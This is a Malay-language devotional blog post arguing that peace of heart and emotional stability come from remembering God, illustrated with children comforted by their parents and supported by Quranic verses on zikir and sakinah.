Mereka mungkin berbeza dari segi cara untuk mencapai ketenangan hati, ketenteraman jiwa dan keheningan rohani, tetapi mereka tetap bersetuju perkara ini penting bagi setiap insan.
Keutuhan atau kemantapan emosi berkait rapat dengan keheningan rohani dan kemantapan minda.
Seseorang yang pemikirannya meyakini bahawa dirinya berasal daripada suatu ketidaksengajaan biologi berevolusi daripada monyet kepada manusia, tentu tidak sama dengan seorang yang yakin bahawa insan adalah ciptaan Tuhan yang paling baik.
Tuhan tetap berperanan dalam setiap gerak hukum apa yang berlaku di bumi dan langit. Dan, Tuhan bukan sahaja berurusan dengan manusia, tetapi setiap atom dan molekul di muka bumi, antara langit dan bumi ini serta apa yang ada di atas langit, semuanya milik mutlak Tuhan Yang Maha Esa.
Seseorang yang menjalani hidup dengan hanya melihat bahawa Tuhan ialah Tuhan dan aku ialah aku, sama sekali tidak sama dengan seseorang yang hidup di atas muka bumi ini dengan mengenal Tuhan ialah satu-satunya Tuhan, dan aku ialah hamba ciptaan-Nya.
Manusia yang menyedari bahawa sentiasa ada kudrat Yang Maha Pengasih lagi Maha Penyayang serta yang sentiasa berkata: Wahai hamba-Ku. Mintalah kepada-Ku. Akan Ku penuhi segala permintaan kamu! Tentulah tidak sama dengan seseorang yang hanya melihat hidup ini hanya antara aku dan kemampuanku!
Seorang anak kecil akan selamat dan tenang apabila di sisi ibu dan bapanya. Bukan sekali kita melihat senario seorang kanak-kanak yang menangis kerana terpisah daripada ibu dan bapa ketika membeli-belah di pasar raya. Kenapa? Adakah kerana fizikalnya cedera? Tentu tidak, tetapi `ketenteraman' dan `ketenangan hatinya' yang tercedera.
Kita juga pernah melihat bagaimana seorang anak kecil yang menangis kerana lututnya berdarah kerana jatuh, berhenti menangis hanya kerana si ibu berkata: `Dah, jangan menangis sikit je tu! Nanti ibu sapukan ubat!'
Adakah dengan berkata demikian, sakit lukanya hilang? Tidak! Sakit luka pada lututnya masih terasa tetapi tangisannya terhenti kerana rasa sakit pada jiwa dan emosinya diubati dan hilang diganti dengan rasa tenteram.
Ini menunjukkan ketenteraman hati dan ketenangan hidup adalah satu kuasa ajaib yang diperlukan dalam hidup.
Dan, adalah satu hukum serta prinsip alam, seseorang itu akan berasa aman dan tenang apabila mengetahui yang di sana ada satu ?kuasa' yang mampu mengatasi segala kebimbangan dan rasa terancam.
Seorang yang genius sekalipun, tanpa kemantapan dan kecemerlangan emosi tidak dapat menggunakan kepintaran dan ketinggian IQ dengan betul jika jiwanya bercelaru dan tidak mantap.
Mereka yang memiliki ketenangan jiwa dapat menghadapi hidup dan masalah hidup dengan penuh ketenangan dan ketertiban.
Bukan semua orang dapat menjadi pandai tetapi semua orang boleh menjadi bijaksana. Allah, Tuhan yang menciptakan manusia malah seluruh alam ini menyatakan sebagai satu prinsip: Bukankah dengan berzikir kepada Allah itu, hati akan menjadi tenang? (Surah Ar-Ra'd: Ayat 28).
Berzikir mempunyai maksud luas, iaitu menyebut dan mengingati Allah, merasakan kehadiran-Nya dan berasa keagungan-Nya setiap masa dan keadaan.
Seseorang yang melihat Tuhan dengan segala kebesaran dan kekuasaan-Nya berada hampir dengan dirinya, pasti akan berasa tenteram dan aman.
Mereka yang benar-benar membina kekuatan dan nur kerohanian yang jernih, pasti tenang hidupnya dan dapat kekentalan serta keharmonian emosi.
Tuhan berfirman: Dialah yang menurunkan `sakinah' ke hati orang-orang yang beriman! (Surah Al Fath: Ayat 4). Erti sakinah ialah ketenangan yang kekal.
Jika demikian, sudah tentu di dalam apa yang diperintah-Nya itu, ada alat untuk membolehkan kita membawa dan membina ketenangan hati, seperti amalan zikrullah, solat, tafakkur, amalan doa dan wuduk.
Semoga hati kita tidak buta daripada melihat dan merasai kebesaran Allah, Tuhan seru sekalian alam.
Subscribe to:
Comments (Atom)







